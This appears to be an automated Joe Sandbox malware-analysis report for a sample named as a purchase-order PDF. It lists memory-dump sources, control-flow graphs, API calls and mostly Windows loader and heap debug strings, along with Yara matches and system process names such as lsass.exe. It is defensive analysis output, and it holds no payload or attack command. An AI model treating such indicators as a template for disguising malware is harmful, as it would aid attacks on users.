                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_PO 2025918 pdf.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID: axD3
                                                                                • API String ID: 2234796835-3556351365

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 89 42ccf3-42cd34 call 404993 call 42dbe3 RtlAllocateHeap
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000104,?,00424CFF,?,?,00424CFF,?,00000104,?,00009D57), ref: 0042CD2F
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_PO 2025918 pdf.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 94 42cd43-42cd84 call 404993 call 42dbe3 RtlFreeHeap
                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F845C700,00000007,00000000,00000004,00000000,004172CE,000000F4), ref: 0042CD7F
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_PO 2025918 pdf.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID:
                                                                                • API String ID: 3298025750-0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 104 42cd93-42cdcc call 404993 call 42dbe3 ExitProcess
                                                                                APIs
                                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,9C41AA96,?,?,9C41AA96), ref: 0042CDC7
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_PO 2025918 pdf.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
                                                                                • API String ID: 621844428-0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 109 16d2c0a-16d2c0f 110 16d2c1f-16d2c26 LdrInitializeThunk 109->110 111 16d2c11-16d2c18 109->111
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                Strings
                                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 01748F3F
                                                                                • *** Inpage error in %ws:%s, xrefs: 01748EC8
                                                                                • This failed because of error %Ix., xrefs: 01748EF6
                                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01748DC4
                                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01748E86
                                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 01748E02
                                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01748FEF
                                                                                • Go determine why that thread has not released the critical section., xrefs: 01748E75
                                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01748DB5
                                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01748DA3
                                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01748D8C
                                                                                • a NULL pointer, xrefs: 01748F90
                                                                                • *** then kb to get the faulting stack, xrefs: 01748FCC
                                                                                • *** enter .cxr %p for the context, xrefs: 01748FBD
                                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01748E3F
                                                                                • The resource is owned shared by %d threads, xrefs: 01748E2E
                                                                                • *** enter .exr %p for the exception record, xrefs: 01748FA1
                                                                                • write to, xrefs: 01748F56
                                                                                • The critical section is owned by thread %p., xrefs: 01748E69
                                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01748F2D
                                                                                • The resource is owned exclusively by thread %p, xrefs: 01748E24
                                                                                • read from, xrefs: 01748F5D, 01748F62
                                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01748DD3
                                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01748E4B
                                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01748F34
                                                                                • The instruction at %p referenced memory at %p., xrefs: 01748EE2
                                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01748F26
                                                                                • <unknown>, xrefs: 01748D2E, 01748D81, 01748E00, 01748E49, 01748EC7, 01748F3E
                                                                                • an invalid address, %p, xrefs: 01748F7F
                                                                                • The instruction at %p tried to %s , xrefs: 01748F66
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • API String ID: 0-108210295
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-2160512332
                                                                                Strings
                                                                                • Critical section debug info address, xrefs: 0170541F, 0170552E
                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0170540A, 01705496, 01705519
                                                                                • Address of the debug info found in the active list., xrefs: 017054AE, 017054FA
                                                                                • Invalid debug info address of this critical section, xrefs: 017054B6
                                                                                • undeleted critical section in freed memory, xrefs: 0170542B
                                                                                • double initialized or corrupted critical section, xrefs: 01705508
                                                                                • Thread identifier, xrefs: 0170553A
                                                                                • Critical section address., xrefs: 01705502
                                                                                • corrupted critical section, xrefs: 017054C2
                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017054CE
                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017054E2
                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01705543
                                                                                • Critical section address, xrefs: 01705425, 017054BC, 01705534
                                                                                • 8, xrefs: 017052E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • API String ID: 0-2368682639
                                                                                Strings
                                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0170261F
                                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017022E4
                                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017025EB
                                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017024C0
                                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01702412
                                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01702624
                                                                                • @, xrefs: 0170259B
                                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01702506
                                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01702498
                                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01702602
                                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01702409
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                • API String ID: 0-4009184096
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                • API String ID: 0-2515994595
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                • API String ID: 0-3197712848
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                • API String ID: 0-1700792311
                                                                                Strings
                                                                                • VerifierFlags, xrefs: 01718C50
                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01718A3D
                                                                                • HandleTraces, xrefs: 01718C8F
                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01718A67
                                                                                • VerifierDebug, xrefs: 01718CA5
                                                                                • VerifierDlls, xrefs: 01718CBD
                                                                                • AVRF: -*- final list of providers -*- , xrefs: 01718B8F
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                • API String ID: 0-3223716464
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                • API String ID: 0-1109411897
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                • API String ID: 0-4098886588
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-792281065
                                                                                Strings
                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 016E9A01
                                                                                • LdrpInitShimEngine, xrefs: 016E99F4, 016E9A07, 016E9A30
                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016E99ED
                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 016E9A2A
                                                                                • apphelp.dll, xrefs: 01686496
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 016E9A11, 016E9A3A
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-204845295
                                                                                Strings
                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017021BF
                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01702178
                                                                                • RtlGetAssemblyStorageRoot, xrefs: 01702160, 0170219A, 017021BA
                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0170219F
                                                                                • SXS: %s() passed the empty activation context, xrefs: 01702165
                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01702180
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                • API String ID: 0-861424205
                                                                                Strings
                                                                                • Loading import redirection DLL: '%wZ', xrefs: 01708170
                                                                                • LdrpInitializeImportRedirection, xrefs: 01708177, 017081EB
                                                                                • LdrpInitializeProcess, xrefs: 016CC6C4
                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01708181, 017081F5
                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 017081E5
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 016CC6C3
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                • API String ID: 0-475462383
                                                                                APIs
                                                                                  • Part of subcall function 016D2DF0: LdrInitializeThunk.NTDLL ref: 016D2DFA
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016D0BA3
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016D0BB6
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016D0D60
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016D0D74
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 1404860816-0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                • API String ID: 0-379654539
                                                                                Strings
                                                                                • @, xrefs: 016C8591
                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 016C855E
                                                                                • LdrpInitializeProcess, xrefs: 016C8422
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 016C8421
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-1918872054
                                                                                Strings
                                                                                • .Local, xrefs: 016C28D8
                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017021D9, 017022B1
                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017022B6
                                                                                • SXS: %s() passed the empty activation context, xrefs: 017021DE
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                • API String ID: 0-1239276146
                                                                                Strings
                                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01703437
                                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01703456
                                                                                • RtlDeactivateActivationContext, xrefs: 01703425, 01703432, 01703451
                                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0170342A
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                • API String ID: 0-1245972979
                                                                                Strings
                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 016F106B
                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016F10AE
                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 016F0FE5
                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 016F1028
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                • API String ID: 0-1468400865
                                                                                Strings
                                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 0170365C
                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 01703640, 0170366C
                                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0170362F
                                                                                • LdrpFindDllActivationContext, xrefs: 01703636, 01703662
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                • API String ID: 0-3779518884
                                                                                Strings
                                                                                • LdrpDynamicShimModule, xrefs: 016FA998
                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 016FA992
                                                                                • apphelp.dll, xrefs: 016B2462
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 016FA9A2
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-176724104
                                                                                Strings
                                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 016A327D
                                                                                • HEAP: , xrefs: 016A3264
                                                                                • HEAP[%wZ]: , xrefs: 016A3255
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                • API String ID: 0-617086771
                                                                                Strings
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                • API String ID: 0-4253913091
                                                                                Strings
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $@
                                                                                • API String ID: 0-1077428164
                                                                                Strings
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                • API String ID: 0-2779062949
                                                                                Strings
                                                                                • Failed to allocated memory for shimmed module list, xrefs: 016FA10F
                                                                                • LdrpCheckModule, xrefs: 016FA117
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 016FA121
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-161242083
                                                                                Strings
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                • API String ID: 0-1334570610
                                                                                Strings
                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 017082DE
                                                                                • Failed to reallocate the system dirs string !, xrefs: 017082D7
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017082E8
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-1783798831
                                                                                Strings
                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0174C1C5
                                                                                • @, xrefs: 0174C1F1
                                                                                • PreferredUILanguages, xrefs: 0174C212
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                • API String ID: 0-2968386058
                                                                                Strings
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                • API String ID: 0-1373925480
                                                                                Strings
                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01714888
                                                                                • LdrpCheckRedirection, xrefs: 0171488F
                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01714899
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                Strings
                                                                                • LdrpInitializationFailure, xrefs: 017120FA
                                                                                • Process initialization failed with status 0x%08lx, xrefs: 017120F3
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01712104
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: #%u
                                                                                Strings
                                                                                • LdrResSearchResource Enter, xrefs: 0169AA13
                                                                                • LdrResSearchResource Exit, xrefs: 0169AA25
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: `$`
                                                                                Strings
